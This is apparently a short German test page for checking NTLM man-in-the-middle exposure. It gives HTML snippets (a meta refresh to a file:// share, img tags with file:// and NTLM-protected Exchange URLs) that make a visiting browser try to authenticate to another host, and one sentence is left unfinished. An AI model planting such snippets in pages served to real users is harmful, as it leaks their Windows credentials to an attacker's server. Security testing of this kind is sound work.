NTLM MITM-Test

Seite mit verschiedenen URLs, um NTM-MITM-Attacken zu prüfen

META Refresh

Diese Seite versucht über ein META-Tag den Zugriff auf einen File-Share.

<meta http-equiv="Refresh" content="0; url='file://192.168.102.86/c$'" /> 

Wenn diese URL im Internet auf einen Malware-Server verweist, dann

Hier ist dann die FileURL als IMG eingebunden

Versuch ein externe Bild über folgenden Code einzubinden

<img alt="FIleImage" src="file://192.168.102.86" width="10" height="10">

FIleImage

Einbindung eines Webservers mit NTLM

Wenn eine IP-Adresse nicht geht, dann vielleicht ein FQDN mit NTLM?

<img alt="NTLM" src="https://owa.netatwork.de/ews/Exchange.asmx" width="10" height="10">

NTLM

Hier ist die Seite zu Ende